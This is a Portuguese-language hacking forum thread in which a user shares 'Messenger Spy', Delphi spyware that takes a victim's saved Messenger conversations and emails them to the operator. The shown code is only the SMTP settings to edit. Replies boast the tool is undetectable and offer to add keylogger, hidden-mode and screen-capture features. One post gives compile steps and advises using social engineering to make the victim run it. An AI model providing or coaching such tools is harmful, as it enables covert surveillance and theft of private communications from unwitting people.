Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Messenger Spy - Espião de Conversas do Messenger

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Delphi Messenger Spy - Espião de Conversas do Messenger


    Messenger Spy - Espião de Conversas do Messenger.
    Codado por Wendel Rodrigues.
    Contato: wendel-wrs@hotmail.com

    Linhas no Source que devem ser modificadas:
    Código:
          From.Text := 'seuemail@yahoo.com.br';
          Recipients.EMailAddresses := 'seuemail@yahoo.com.br';
    
          smtp.Username := 'seulogin';
          smtp.Password := 'suasenha';
          smtp.Host := 'smtp.mail.yahoo.com.br';
          smtp.Port := 25;
    Todas as partes do codigo acima que estão destacados, deverão ser modificados conforme os seus dados.

    Qualquer duvida, sujestões ou criticas, entre em contato comigo.

    Obs. O Messenger Spy, ele somente captura as converssas que são salvas no computador da vitima e envia para o email configurado, na proxima versão quero que ele capture as conversas simultaneamente, quem sabe usando as APIs do Messenger.

    Download do Source:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Se voce implementar alguma função, qualquer melhoria no codigo, poste o link para download aqui nesse post, e lembre-se de deixar os credidos.
    Similar Threads

  • Font Size
    #2
    olá amigo, se funcionar tenho um keylogger que criei em delphi e posso implementar pra ele ficar ainda mais arrojado, o meu ja tem função para enviar para pendriver especifico e tambem para email. abraço, qualquer coisa to aqui

    Comment


    • Font Size
      #3
      Muito bom em manow vlw mesmo pelo posta muito rox

      Comment


      • Font Size
        #4
        gutemberg.aci fique avontade para implementar qualquer melhoria na source, postando a source depois aqui para a galera estudar.

        Comment


        • Font Size
          #5
          Parabens eh indectavel e ja adicionei umas funções como por exemplo configurar email em edits e um botão que poe em modo hidden e shortcut que restaura hide= 0, mas tem um problema nem no modo normal nem apos eu ter editado esta mandando os anexos somente manda

          Conversas de: ********

          As conversas estão todas anexadas.
          mas naum esta enviando o anexo :>(

          Comment


          • Font Size
            #6
            o link para baixar tá off, alguém pode postar um atualizado para nós ?

            obrigado.

            Comment


            • Font Size
              #7
              Se alguem ainda tiver interesse de baixar o codigo fonte, segue o link para download:

              Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

              Comment


              • Font Size
                #8
                Muito bom o post!
                sigpic



                Comment


                • Font Size
                  #9
                  vlw cara. to contruindo um kl priv8, com várias e várias funcs e ate agora ta indetect, vo implementa isso ai nele u.u
                  PS: Meu Nome pronuncia-se Bósco e NÃO bôsco

                  Veja quem é seu exemplo de vida:

                  1-> Escolha seu numero preferido de 1 a 9.
                  2-> Multiplique por 3
                  3-> Some 3 ao resultado
                  4-> Multiplique o resultado por 3
                  5-> Some os DIGITOS do resultado. por exemplo, se o resultado final deu 51, entao some 5 + 1 que da 6 depois procure na tabela abaixo

                  1- Hitler
                  2- Barack Obama
                  3- Tom Cruise
                  4- Kevin Mitnick
                  5- Bill Gates
                  6- Jose Sarney
                  7- Felipe Massa
                  8- Kaká
                  9- Bosco ( eu )
                  10- Paris Hilton

                  Comment


                  • Font Size
                    #10
                    alguem me ajuda a usar isso? por favor..me ajudem.

                    Comment


                    • Font Size
                      #11
                      Evelinebib voce so precisa mudar essas linhas do source e depois compilar.

                      Código:
                        
                            From.Text := 'fulano20@yahoo.com.br'; // Aqui voce coloca seu email
                            Recipients.EMailAddresses := 'fulano20@yahoo.com.br'; // Aqui voce coloca seu email
                      
                            smtp.Username := 'fulano20'; // Aqui voce coloca seu login, é so tirar o @yahoo.com.br do seu email
                            smtp.Password := '12345678'; // Aqui voce coloca sua senha.
                            smtp.Host := 'smtp.mail.yahoo.com.br'; // Se voce usar o email da yahoo entao deixa assim.
                            smtp.Port := 25; // Se voce usar o email da yahoo entao deixa assim.

                      Comment


                      • Font Size
                        #12
                        me ensina como faço isso? qual programa ultilizar? não sei nada

                        Comment


                        • Font Size
                          #13
                          Vixixixi


                          aee Brother Tu é feraa
                          eu tava precisando dessa porq eu coloquei nele um Screnn Captures tipo ServerSocket ae manda pru Cliente

                          flwww
                          The kILL3r

                          Comment


                          • Font Size
                            #14
                            Olá evelinebib, para que voce entenda como proceder para editar e compilar essa source, voce precisa saber um pouco de Delphi.
                            Para começar voce precisa ter o Borland Delphi 7 instalado em seu computador.

                            Apos a instalação do mesmo, falando de uma forma bem simples, é so voce abrir o Project2.dpr, e editar as linhas que citei logo acima. Feito isso voce precisa compila-lo, precione Ctrl+F9 e sera gerado um aquivo executavel, cujo o nome será Project2.exe.

                            Renomeie o para o nome que melhor lhe convém, use uma Engenharia Social para fazer que a vitima execute o "Espião".
                            Depois que a vitima executou o "Espião", voce devera olhar no email configurado na source, e vera la no email todas as conversas da vitima anexadas.

                            Comment


                            • Font Size
                              #15
                              Valeu brother, bom poste.
                              sigpic

                              Comment

                              X
                              Working...
                              X